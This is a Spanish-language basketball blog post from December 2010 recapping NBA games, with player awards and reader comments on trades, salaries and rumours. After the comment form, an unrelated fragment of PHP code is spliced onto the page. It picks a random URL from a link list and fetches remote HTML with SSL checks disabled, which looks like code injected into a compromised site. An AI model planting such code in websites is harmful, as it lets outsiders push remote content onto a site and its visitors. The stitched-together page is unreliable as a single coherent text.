La Crónica (15/12/2010)

16 de December de 2010 por TheDeerHunter

Partidazo alucinante en el Madison. Spike Lee se frotaba los ojos al ver a su equipo del alma poner contra las cuerdas a los Celtics. Stoudemire arrasaba en ambas zonas, un Felton en estado de gracia dirigía a su equipo a la perfección y todo funcionaba al nivel de un conjunto que llegaba a parecer imbatible. Los verdes, a remolque, no eran capaces de defender con eficacia. Todo parecía perdido cuando Rondo se marchaba al vestuario con un fuerte esguince de tobillo. Sin embargo, el gran arma de los Celtics es no rendirse jamás y suelen brillar más cuanto más feo pinta el panorama. El viejo Big Three volvió a enseñar los dientes una vez más: Apareció la brega de Garnett, los triples de Allen y anoche, sobre todo, la genialidad de un pura sangre como Pierce, con una actuación digna de los más grandes. El último minuto fue un carrusel de acciones brillantes: triple de Allen para ponerse por primera vez por delante, 2+1 maravilloso en una bomba de Gallinari, canastón clásico de Pierce en la cara de Stat y, para redondear, un triple de este último para ganar pero fuera de tiempo (118-116). I love this game.

Los Heat siguen la estela. Recibían a los Cavs sin tanta acritud y no fue tanto “the ex -king” como Wade quien decidió el choque, mucho más igualado que el que tuvo lugar en Ohio (95-101). Los Bulls también mantienen el ritmo (110-93). Doblegaron a unos Raptors sin Bargnani ni Calderon con un partidazo de Boozer, pero perderán a Noah unas 8 o 10 semanas por una grave lesión en un dedo.

Pasando a la zona alta del Oeste, los Spurs tuvieron suerte de mantener su racha victoriosa (90-92). Un buzzer-beater de Manudo evitó la segunda machada consecutiva de los Bucks liderados inusualmente por Douglas-Roberts que está cogiendo muy rápido la forma. Los Mavs también sufrieron pero prevalecieron contra Portland (98-103) y tanto Lakers como Oklahoma tuvieron pocos problemas para doblegar a Pacers (109-94) y Rockets (105-117), respectivamente.

Para terminar los Sixers ganaron a los Clippers (91-105), los Grizzlies a los Bobcats (80-113), Hornets a los Kings (91-94) y en Phoenix hubo nueva master-class de dirección de Steve Nash para gozo de sus compañeros y padecer de los Wolves (122-128).

PREMIOS

MVP: Los Bulls pueden sentirse satisfechos con el el fichaje de Carlos Boozer. Anoche acudió a su rescate con 34 puntos y 12 rebotes en 26 minutos para vencer a los Raptors. Y Paul Pierce liquidó a los Knicks con 32 puntos, 10 rebotes y la canasta ganadora a falta de 0.4 segundos.

Rookie: El premio “Blake Griffin” va para… Blake Griffin. 20 puntos, 18 rebotes y 5 asistencias para el amo y señor de los Clippers. Si hablamos del resto, Demarcus Cousins sigue a buen nivel con los 13 puntos y 7 rebotes de hoy y Wesley Johnson se ha ido a los 17 puntos, 4 rebotes y 5 asistencias.

Sorpresa: ¿No habíamos quedado que Antawn Jamison y Mo Williams se iban a hinchar ahora que se quedan solos en los Cavs? Pues no es la primera vez que el mejor del equipo es Daniel Gibson. Ayer, por ejemplo, se fue a los 26 puntos.

Decepción: Y hablando de Mo Williams, anoche se cascó un 1 de 10 en triples. ¿Buscaba impresionar a su ex-jefe?

Esfuerzo en vano: No se puede ganar siempre. Esta vez, los 39 puntos, 10 rebotes y 3 tapones de Amare Stoudamire no encontraron la recompensa de la victoria, aunque por bien poco. A Lamarcus Aldridge le pasó lo mismo. Sus 35 puntos y 10 rebotes fueron insuficientes para doblegar a los Mavs.

Comenta

18 comentarios a esta entrada

  1. Busky23 dice:
    #1

    Al levantarme esta mañana y ver el boxscore del partido del Madison me ha venido a la mente la misma frase: I LOVE THIS GAME,ya tengo deberes para esta tarde,este superpartido hay que verlo.
    Enorme el Big Three,y una vez más sobresaliente para la pareja Amare-Felton.
    Nunca se rinden estos verdes,deberían grabarle en sus camisetas la celebre frase de Rudy Tomjanovic “nunca subestimes el corazón de un campeón”,el espectáculo vuelve por fin a la capital del mundo.
    Gran jornada la de hoy,con actuaciones sobresalientes,nada que ver con el pestiño de partidos que sufrimos ayer.
    Una lastima lo de Noah,baja importantísima para Chicago ahora que las cosas funcionaban a la perfección,todo queda en manos de Boozer.
    Festival de triples en Phoenix,Manudo (All-Star?),demostrando quien es el líder de estos Spurs(21-3),Lakers paseando a Miss Daysi con una primera mitad colosal de nuestro Pau,Durant entonándose,Miami con los cuchillos afilados…en fin,podría estar hoy líneas y líneas comentando esta pedazo d jornada que me hace recordar otra vez: I LOVE THIS GAME!

    Saludos.

      Citar

  2. telekoman dice:
    #2

    Lo que tampoco entiendo es como a Splitter le están dando tan poca bola en SAS. 11 minutos de media me parece poco teniendo en cuenta la edad de Duncan. Teniendo en cuenta lo que dijo Popovich en su momento de él, ¿no sería mejor ir dándole más minutos si quieres que sea tu duncan dentro de 2 años? ¿O es que ha cambiado de opinión y no han llegado las noticias? ¿Alguien sabe algo de esto?

      Citar

  3. Denise dice:
    #3

    Stoudamire está callando bocas, entre ellas, la mía.
    Que Matt Bonner y McDyess jueguen más que Splitter es inexplicable.
    Décima victoria consecutiva de Miami, alcanzarán el 72-10?? xD
    Sigo sin entender el trade Vujacic-Joe Smith, ni en lo deportivo ni en lo económico.
    La temporada de Marc y Rudy están siendo decepcionantes, sobre todo en el acso del mallorquin, de 46 tiros de campo encestados, 34 han sido triples, por sólo 12 tiros convertidos de 2 puntos. Rudy, macho, diversificate, que no creo que Mcmillan te tenga atado con una cuerda en la esquina

      Citar

  4. nacho dice:
    #4

    Mi boca también, si nos atenemos a sus números y a su impaco, pero sigo diciendo lo mismo, Hace pasos FLAGRANTES en casi todas finalizaciones de Pick, Esta noche dos de tres de las que salen en los highlights. Supongo que las reglas son para todos iguales, y este es un deporte en el que se priman los fundamentos (o debería ser así), y a este paso se saldrán solo los que tienen físico privilegiado, y ahí sí, ahí habrán matado todo el interés que tiene este deporte, volveré al futbol, ahora que el barÇa prima la técnica, la belleza y el espectáculo, y parece que hundimos a los físicos ceroceristas de finales ypreincipios de siglo. Acordémonos de la Grecia de la Euro2004
    Igualito ver al Stat que a Duncan, Nowitzki o Gasol

      Citar

  5. Txusma dice:
    #5

    @Denise,

    a nivel deportivo no lo tengo claro pero los beneficios a nivel económco están claros. Joe Smith cobra 1’3 millones de dólares y Vujacic 5,4 millones. Su intercambio le supone al propietario un ahorro de 4 kilos (algo menos pq ya ha empezado la temporada, pero un pico al fin y al cabo).
    Creo q muchas veces nos olvidamos que aquí se juega con dinero real y que a parte del tema de que un contrato finalice a final de temporada hay que tener en cuenta que ese contrato hay q pagarlo mientras el jugador esté en tu equipo. New York se hizo con el expiring de TMac y liberó 20 y tantos millones a final de temporada pero mientras estuvo en el equipo le tuvo que pagar más de 1’5 millón de dólares mensuales, ojo.

      Citar

  6. TheDeerHunter dice:
    #6

    Como dice Txusma a nivel económico el beneficio inmediato es más que evidente… pero tal y como están las cosas con Brown (y con Barnes no olvidemos), cuanto estaba jugando Vujacic y los problemas que han tenido para hacer una sustitución digamos que de 5 minutos de calidad para los interiores el tema deportivo está bien claro. Está muy claro que Phil no considera a Caracter un jugador válido actualmente.
    La historia está repleta de Pterodáctilos ganando anillos y Joe Smith siempre me ha parecido un jugado útil para los equipos donde ha estado. El año pasado en Atlanta disputó 64 partidos a 9 minutos por partido marcándose un 3-3 que no está nada mal. Ya me gustaría a mí que diera ese rendimiento en L.A.
    De todas formas, para tener a un tío dormido en el fondo del banquillo mejor que cueste 1,3 que 5,4. Pura matemática, Denise.

      Citar

  7. -=TheKing=- dice:
    #7

    Que partidazo el de los Celtics impresionante lo cojones que le hecha ese equipo.

    Cuando mete el último tiro Pirce Nate Robinson se pone a pegar botes y fajaros la hostia que se da, para partirse el cuello.

      Citar

  8. Sempren dice:
    #8

    Robinson está como una cabra xD

    Cuántos nos equivocamos con Stat, madre mía… nueve partidos seguidos pasando de 30 puntos, y su equipo no perdía, precisamente.

      Citar

  9. -=TheKing=- dice:
    #9

    Yo sigo pensando que con Nash marcaría más y con menos esfuerzo, porque felton no pasa tan bien entre jugadores después del p&r.

      Citar

  10. LEmontus dice:
    #10

    the king ha estado con nash y no ´hizo 9 partidos seguidos con mas de 30 puntos entre otras cosas.

    Yo creo que Splitter puede tener más minutos está claro pero no olvidemos que la NBA es baloncesto de especialistas y Bonner es especialista en romper partidos con su muñeca. Yo creo que Pops no se está equivocando cuando lleva a sus Spurs lider.
    Y personalmente en el partido de hoy prefería que estuviese Splitter a Bonner en la pista porque no creo que el brasileño pudiera plantarle cara…(uno de los tapones del australiano fue a Splitter).
    Además tampco hay que olvidar ya no está en europa y no es lo mismo enfrentarte aun Camby Bogut o Stoudemire que a un Felipe Reyes o un Fran Vazquez .

      Citar

  11. LEmontus dice:
    #11

    cuando digo plantarle cara…. es plantarle cara a Bogut.

      Citar

  12. Denise dice:
    #12

    Pero si Smith cobra 1,3 y Vujacic 5,4, el resto de los 4 kilos, donde están? Los Lakers se han hecho con alguna ronda de draft?
    Entonces, los Lakers se ahorran unos 5,4 millones, no? A vujacic le quedaban por cobrar mas o menos 4 kilos + 4 por el impuesto de lujo, igual a 8, menos el salario de Joe Smith más su impuesto de lujo correspondiente (2, 6 en total). Las matematicas no es lo mío.

    Si a Splitter no le dan minutos y confianza, no sabemos si puede o no enfrentarse a un Camby o a un Bogut, lo que tengo claro es que Bonner no sería MVP en ACB ni uno de los mejores jugadores de la Euroliga ni en 7 vidas.

      Citar

  13. LEmontus dice:
    #13

    tu no sabes si leBronner sería o no MVp en europa lo que si que sabes es que bonner puede meter 7 de 7 en triple sen un partido y Splitter no.

    P.D: Charlie bell si no recuerdo mal se marcó una tmeporada de 25 puntos aquí en España.

      Citar

  14. Txusma dice:
    #14

    Mira, no me había acordado del impuesto de lujo. El ahorro es el doble pues.

    En los traspasos, la norma dice que si un equipo está por encima del límite no puede recibir más del 110% (o así, ahora no recuerdo) del salario que traspasa. En este caso, los Lakers estan por encima pero bajan salario, no suben por lo q no hay problema. Los 4 kilos se los han llevado los Nets, que como estaban por debajo han podido asumir el salario de Vujacic. A cambio de eso (y de Terrence Williams) han ganado 2 primeras rondas del draft.

      Citar

  15. Vader dice:
    #15

    Cuidadin con el traspaso de Vujacic y Joe Smith que con esas rondas del draft que recibe New Jersey no se este cocinando el traspaso de Carmelo para los Nets.

    Saludos!! Go Knicks!!!

      Citar

  16. Vader dice:
    #16

    Por cierto mañana en cuatro NY Knicks vs Miami Heat… sobran las palabras…

      Citar

  17. GreenPride dice:
    #17

    El mejor partido de lo que llevamos de temporada el que se vivio en el Madison. Los Knicks salieron lanzados jugando abierto y con Stat jugando con Erden que ni lo veia. Hasta el tercer cuarto siempre llevaron la iniciativa gracias a que a los Celtics les costaba muchísimo defender los 2×2 de Amare y Felton y si se cerraban los tiradores (Chandler sobre todo) les mataban. Sobrevivieron con su espíritu competitivo y su superioridad interior que ya les daaba 32 puntos “in the paint” al descanso. La segunda parte empezó con dominio Celtic hasta que Gallinari se entonó y devolvió la delantera a los Knicks. Se lesionó Rondo y parecía que el partido iría a manos de los Knicks y su intensidad pero ahí apareció el espíritu de los Celtics que querían ganar el partido a toda costa y con el Big Three entonado y Rondo de vuelta a la cancha medio cojo para dirigir el ataque se agarraron a la pista hasta llegar al final y ahí la calidad de los Celtics y Pierce acabó decidiendo… aunque si llegan a quedar unas décimas más Amare habría acabado su increíble partido con un buzzer-beater tremendo para ganarlo (de hecho lo hizo pero fuera de tiempo).
    Me sorprendieron mucho los Knicks que me parece un equipo de gran intensidad y muy difícil de defender. Su problema es la defensa interior pero creo que si sigue así con esa intensidad y con un Amare en plena forma el equipo llegará a playoffs y allí no será fácil tumbarlos

      Citar

  18. Ru dice:
    #18

    Quiero plantear un pequeño debate:¿necesitan los Knicks a Carmelo y/o a Chris Paul?

    Ante los rumores que han venido surgiendo desde que CP3 dijera en verano que el próximo “Big Three” se vería en La Gran Manzana y que estaría formado por Amare,Carmelo y él mismo,y sobre todo por las últimas fechas donde se comenta que Anthony sólo firmaría la extensión de su contrato si es traspasado a NYK,me he hecho esa pregunta tras observar el excelente rendimiento de la plantilla actual de NYK.

    Inicialmente se podría pensar que Carmelo y Paul tendrían cabida en cualquier equipo de la NBA -quizás salvo Heat y Lakers-,pero no hay que olvidar que la mejora de Carmelo se ha producido desde la llegada de un veterano como Billups a la ciudad de Denver.¿¿No creeis que en los Knicks Carmelo y Amare podrían chocar en cuanto roles y sobre todo egos??Bajo mi punto de vista no sería beneficioso un binomio Carmelo-Stoudemire.Sin embargo si vería muy positiva la aportación que podría hacer en ese equipo CP3 -evidentemente habría que ver que dan los Knicks por él- ya que Felton está dando un mayor rendimiento del esperado y en ese sentido CP3 es más fiable.Además el juego del base de los Hornets se adapta a la perfección al de Amare.

    ¿Qué opinais?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>